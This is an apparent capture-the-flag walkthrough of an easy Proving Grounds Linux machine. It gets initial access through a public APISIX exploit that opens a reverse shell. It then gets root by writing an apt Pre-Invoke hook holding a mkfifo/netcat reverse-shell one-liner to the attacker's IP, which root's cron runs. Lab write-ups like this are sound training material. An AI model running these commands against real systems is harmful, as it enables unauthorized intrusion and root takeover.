Basic Information: PG Practice Linux Machine, Level Easy, Target IP: 192.168.248.220

TL;DR for those who only want a quick solution. 

  1. Found 43500 port is vulnerable to exploit 50829, exploit it grants you the initial foothold. 
  2. /etc/apt/apt.conf.d directory is writable.

Initial Enumeration

Keep scanning for version information.
sudo nmap -sS 192.168.248.220 -p22,80,3306,43500 -vv -sV -A

  1. 22, a regular open SSH port, normally you don’t get the initial foothold from there.
  2. 80, http port, title Upright, nginx/1.18.0
  3. 3306, MySQL unauthorized
  4. 43500, OpenRest web app server, header showing APISIX/2.8

We’ll start to take a look of the web port 80 first by visiting http://192.168.248.220

content of port 80

  1. Nothing too special, just a website, clicking most of the buttons returns to the home page. Understandable, this is a CTF VM, no need to make it too functional. Using curl + grep and sed to find all the href keywords on the web, found nothing useful.
    1. One information could be useful is the email address [email protected]
  1. Obviously port 3306 and 43500 are very suspicious, but I would like to go through my regular steps on pentest, that is I would like to enumerate the directories on target’s web port 80 first. I normally use gobuster with dirb’s big.txt wordlist.
    1. gobuster dir –url “http://192.168.248.220” -w /usr/share/wordlists/dirb/big.txt
  1. Based on past experience, we don’t need to care about these three found folders, they don’t contain anything. 

Now Let’s move on to port 3306, using mysql -h 192.168.248.220 is showing connection not allowed.

Our only hope is port 43500, visit the site showing nothing but an error message

  1. Remember that from the port scan, it is showing the title of the web port 43500 is APISIX/2.8, now let’s search it on exploit-db.com, or using searchsploit at Kali’s terminal
  1. Found one, the id is 50829, let’s grab it using searchsploit -m 50829, and then take a look how to use it. 
  1. From header, it is showing the exploit is working against APISIX 1.3 – 2.12.1, our target’s version is APISIX 2.8, technically that should work.
  2. Take a look of the usage
    1. The arguments are target_url, lhost and lport

Initial Foothold

Previously we found the exploit 50829.py, now let’s use it against our target 

  1. Before run it, set up a netcat listener first
    1. nc -nlvp 443 
  2. Run the exploit
    1. python3 50829.py http://192.168.248.220:43500/ 192.168.45.235 443
  1. Nice the exploit is working, we are franklin in this system. But there is a problem, running ls -la showing my permission is denied. typing pwd showing we are in the /root directory
  1. To solve this issue, we’ll go to /home/franklin, before that switch to interactive shell first, we’ll use
    1. python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
  2. At /home/franklin, we found the local.txt, that’s one unprivileged flag.

Now we need to escalate the privilege

Privilege Escalation

Normally I’ll manually enumerate the system first, I’ll try

  1. sudo -l
    1. to see if I could run any command with sudo
  2. find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
    1. fo find any unusual Suid being set for some binaries, if there is any, lookup on https://gtfobins.github.io/# to see how to exploit it.
    2. actually I found /bin/ssh-agent’s suid is being set, but it is not exploitable. 

I also tried to look into some files to see if there is any sensitive credential, unluckily found nothing. This is where I deploy linpeas.sh (https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS) , it’s smarter and stronger than me. 

  1. Deliver the linpeas.sh to the franklin’s reverse shell, chmod +x linpeas.sh to grant execution a bit to it, then run it. 
  2. Found this key information that I as franklin could write to /etc/apt/apt.conf.d, though on the output, it said I could look it up on the given link https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files, I could not find a solution there. But it’s not too difficult to use google, just google etc apt apt.conf.d privilege escalation, I found this page to be very useful. https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/
    1. To make the exploit work, it requires someone with root privilege running apt-get update
    2. looking into /etc/crontab, we see that the root user’s auto task has apt-get update. Which means we could escalate the privilege via /etc/apt/apt.conf.d
  1. Now we set up another netcat listener. I normally use the port numbers that are allowed to go through the firewall, like 443, 445, 22, 53, etc.
    1. nc -nlvp 445
  2. at franklin’s reverse shell, type the following commands, we should expect a reverse shell very soon.
    1. cd /etc/apt/apt.conf.d
    2. echo ‘apt::Update::Pre-Invoke {“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.235 445 >/tmp/f”};’ > pwn

Mission Accomplished!